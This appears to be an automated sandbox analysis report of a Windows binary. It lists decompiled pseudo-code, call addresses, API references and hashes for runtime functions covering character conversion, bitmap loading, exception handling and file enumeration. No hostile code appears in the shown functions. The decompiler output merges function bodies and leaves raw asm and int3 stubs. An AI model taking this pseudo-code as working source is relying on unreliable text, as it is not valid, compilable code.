			E0085B645(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x86d668; // 0x14325215
				_v8 = _t34 ^ _t70;
				E008533B6(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x47e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0084E243(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0084E920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00859868(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00857B00(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00860F30();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0085b64d
0x0085b654
0x0085b660
0x0085b665
0x0085b66a
0x0085b66f
0x0085b66f
0x0085b672
0x0085b674
0x0085b674
0x0085b679
0x0085b692
0x0085b698
0x0085b69d
0x0085b73c
0x0085b740
0x0085b745
0x0085b745
0x0085b761
0x0085b761
0x0085b6a3
0x0085b6ab
0x0085b6af
0x0085b6fb
0x0085b6fd
0x0085b6ff
0x0085b704
0x0085b71b
0x0085b723
0x0085b733
0x0085b733
0x0085b723
0x0085b735
0x0085b736
0x00000000
0x0085b73b
0x0085b6b6
0x0085b6b8
0x0085b6ba
0x0085b6c2
0x0085b6df
0x0085b6e9
0x0085b6ee
0x00000000
0x00000000
0x0085b6f0
0x0085b6f6
0x0085b6f6
0x00000000
0x0085b6f6
0x0085b6c6
0x0085b6ca
0x0085b6cf
0x0085b6d3
0x00000000
0x00000000
0x0085b6d5
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,47E85006,00853546,00000000,00000000,0085457B,?,0085457B,?,00000001,00853546,47E85006,00000001,0085457B,0085457B), ref: 0085B692
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085B71B
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0085B72D
__freea.LIBCMT ref: 0085B736

Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: a9e527d37b89e741281bbe68357aa4fb32ff9299618802ea8ad191b047555bdf
Instruction ID: ac93254dfca49371e8c2f972044dd179e674800f8828050f0226adc080afe618
Opcode Fuzzy Hash: a9e527d37b89e741281bbe68357aa4fb32ff9299618802ea8ad191b047555bdf
Instruction Fuzzy Hash: 8B31DE72A0020AABDF248F68DC85DAE7BA5FB64711F054168FC04DA290EB35DD58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0084A553, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084A553(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0x870060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E008496AD(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E0084959D(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E008496AD(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E008495FF(_v20);
					_t13 = E008497D0(_t21, _t32, _t22, E008495BC(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}

0x0084a553
0x0084a553
0x0084a569
0x0084a56d
0x0084a570
0x0084a572
0x0084a57b
0x0084a57b
0x0084a584
0x0084a591
0x0084a59c
0x0084a5a5
0x0084a5a9
0x0084a5ac
0x0084a5ae
0x0084a5ae
0x0084a5a9
0x0084a5b3
0x0084a5c3
0x0084a5cb
0x0084a5cd
0x0084a5cf
0x0084a5d7

APIs

LoadBitmapW.USER32(00000065), ref: 0084A563
GetObjectW.GDI32(00000000,00000018,?), ref: 0084A584
DeleteObject.GDI32(00000000), ref: 0084A5AC
DeleteObject.GDI32(00000000), ref: 0084A5CB

Part of subcall function 008496AD: FindResourceW.KERNELBASE(00000066,PNG,?,?,0084A5A5,00000066), ref: 008496BE
Part of subcall function 008496AD: SizeofResource.KERNEL32(00000000,75085B70,?,?,0084A5A5,00000066), ref: 008496D6
Part of subcall function 008496AD: LoadResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496E9
Part of subcall function 008496AD: LockResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496F4

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: d58b3e20349dcd440b387862a0682efdd6b3a680f93321490f08df938541e045
Instruction ID: ea87af6915d35267a3c12dd707b9e121a3b151540b3fca82fc0b1c3999afba3c
Opcode Fuzzy Hash: d58b3e20349dcd440b387862a0682efdd6b3a680f93321490f08df938541e045
Instruction Fuzzy Hash: 61012B32A8020D27D621777C9C45F7F766DFFD5B61F0A0110FD40EB151DD528C0182A2

Uniqueness

Uniqueness Score: -1.00%

Function 00851AC7, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00851AC7(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00852116(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0084F1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00852318(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E008518D1(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0084F1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00851ac7
0x00851ac7
0x00851aca
0x00851acf
0x00851ad2
0x00851ad4
0x00851ad7
0x00851ada
0x00851adb
0x00851ade
0x00851ae3
0x00851ae3
0x00851ae6
0x00851aea
0x00851aed
0x00851af2
0x00851aef
0x00851aef
0x00851aef
0x00851af5
0x00851afb
0x00851afe
0x00851b00
0x00851b03
0x00851b06
0x00851b07
0x00851b10
0x00851b15
0x00851b18
0x00851b1e
0x00851b21
0x00851b24
0x00851b27
0x00851b28
0x00851b2b
0x00851b36
0x00851b3a
0x00000000
0x00851b3a
0x00851b41

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00851ADE

Part of subcall function 00852116: ___AdjustPointer.LIBCMT ref: 00852160

_UnwindNestedFrames.LIBCMT ref: 00851AF5
___FrameUnwindToState.LIBVCRUNTIME ref: 00851B07
CallCatchBlock.LIBVCRUNTIME ref: 00851B2B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: e3da2a47c8b844266460c9267bddc60f008fad40a125ee031368b8d419d6242b
Instruction ID: 53b8a19a5a8f49e8048119df54e4f3c56cba5f322639ebe3a1da87fec520a603
Opcode Fuzzy Hash: e3da2a47c8b844266460c9267bddc60f008fad40a125ee031368b8d419d6242b
Instruction Fuzzy Hash: E6012932000109BBCF129F59CC05EDA3BBAFF49755F048018FE18A2121D776E865DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008515E6, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008515E6() {
				void* _t4;
				void* _t8;

				E00852A14();
				E008529A8();
				if(E008526CE() != 0) {
					_t4 = E00851726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0085270A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x008515e6
0x008515eb
0x008515f7
0x008515fc
0x00851601
0x00851603
0x0085160e
0x00851605
0x00851605
0x00000000
0x00851605
0x008515f9
0x008515f9
0x008515fb
0x008515fb

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 008515E6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 008515EB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 008515F0

Part of subcall function 008526CE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 008526DF

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00851605

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: ddf0adde804129e3e3aff551b43878df0a9a162d909846b3bb4641761f25f26c
Instruction ID: 2e314ab051d43ac8a9451847d41767add630b46f44791c4f2426b6acfdfc8104
Opcode Fuzzy Hash: ddf0adde804129e3e3aff551b43878df0a9a162d909846b3bb4641761f25f26c
Instruction Fuzzy Hash: 0DC04C58050641541C647ABC221A7AD0780FDB77D7F9015D1FD51E71176E15440F9937

Uniqueness

Uniqueness Score: -1.00%

Function 008497D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E008497D0(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E00849682() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0x8633ac);
					_push(1);
					_push(0);
					_push(0x86417c);
					if( *0x86dff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0x86418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E0084E920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0x86dedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E008499C7();
			}

0x008497d0
0x008497da
0x008497f5
0x00849801
0x0084980b
0x00849812
0x00849816
0x00849817
0x0084981d
0x0084981f
0x0084981f
0x00849826
0x00849828
0x00849829
0x00849831
0x00849832
0x00849833
0x00849840
0x008499bb
0x00000000
0x00849846
0x00849846
0x00849856
0x0084985b
0x0084985f
0x0084986c
0x00849876
0x00849877
0x0084987d
0x0084988f
0x00849893
0x00849895
0x00849896
0x00849898
0x00849899
0x0084989a
0x0084989d
0x0084989e
0x0084989f
0x008498a4
0x008498a8
0x008498ae
0x008498c4
0x008498cc
0x008498d6
0x008498dc
0x008498e0
0x008498e9
0x008498ee
0x008498f1
0x00849908
0x0084990e
0x0084991c
0x0084991e
0x0084992a
0x0084992d
0x00849942
0x00849945
0x00849949
0x0084994d
0x00849951
0x00849958
0x0084995c
0x00849960
0x00849969
0x00849974
0x00849979
0x0084997a
0x00849980
0x00849987
0x00849982
0x00849982
0x00849982
0x0084998d
0x00849994
0x00849994
0x00849997
0x0084999e
0x008499a1
0x008499a8
0x008499ab
0x008499b2
0x008499b7
0x008499b9
0x008499b9
0x00000000
0x008499b7
0x008498b0
0x008498b7
0x008498b7
0x0084987f
0x00849886
0x00849889
0x00849889
0x00849864
0x00000000
0x00849864
0x00849840
0x008497dc
0x008497e0
0x008497e4
0x00000000

APIs

Part of subcall function 00849682: GetDC.USER32(00000000), ref: 00849686
Part of subcall function 00849682: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00849691
Part of subcall function 00849682: ReleaseDC.USER32(00000000,00000000), ref: 0084969C

GetObjectW.GDI32(?,00000018,?,00000000,?,75085B70), ref: 00849801

Part of subcall function 008499C7: GetDC.USER32(00000000), ref: 008499D0
Part of subcall function 008499C7: GetObjectW.GDI32(?,00000018,?,?,?,75085B70,?,?,?,?,?,008497ED,?,?,?), ref: 008499FF
Part of subcall function 008499C7: ReleaseDC.USER32(00000000,?), ref: 00849A93

Strings

(, xrefs: 008498CC

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 0e69a922c5abd2b7799eb69425ac6cf9c1b719ee0a0eefde93f32524624ffbbd
Instruction ID: 8fee0216f41192f783d5442132907fc8869a24ce7612119f0b8014842f220005
Opcode Fuzzy Hash: 0e69a922c5abd2b7799eb69425ac6cf9c1b719ee0a0eefde93f32524624ffbbd
Instruction Fuzzy Hash: 5A611471604305AFD220CF68C884E6BBBE9FF89704F10492DF59ACB260DB71E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00840AC7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00840C81

Strings

%s: %s, xrefs: 00840C90
%ls, xrefs: 00840B06, 00840B1C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 884bf7715d43d3ae9f289526fa7ca7b81d36c1dda1f2161b56ce9d4826dbcd7a
Instruction ID: 0a04a8a2e3afc5a1e43b63ac1f6ffe29bd96aa749b9c5a114b6d481915666699
Opcode Fuzzy Hash: 884bf7715d43d3ae9f289526fa7ca7b81d36c1dda1f2161b56ce9d4826dbcd7a
Instruction Fuzzy Hash: 95513431A8C70CFAF6211A949D42F237655FB18B1CF308A0BB797E44E0C5B65510AF4B

Uniqueness

Uniqueness Score: -1.00%

Function 00859E9E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00859E9E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00856F32(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0085DDC1(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00857E31();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00857B91(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0085DDC1(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0085A26D(_a12, _t193, __eflags, _t213);
													E00857AC6(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0085DDC1(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00857E31();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x86d668; // 0x14325215
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0085DE10(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0084E920(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
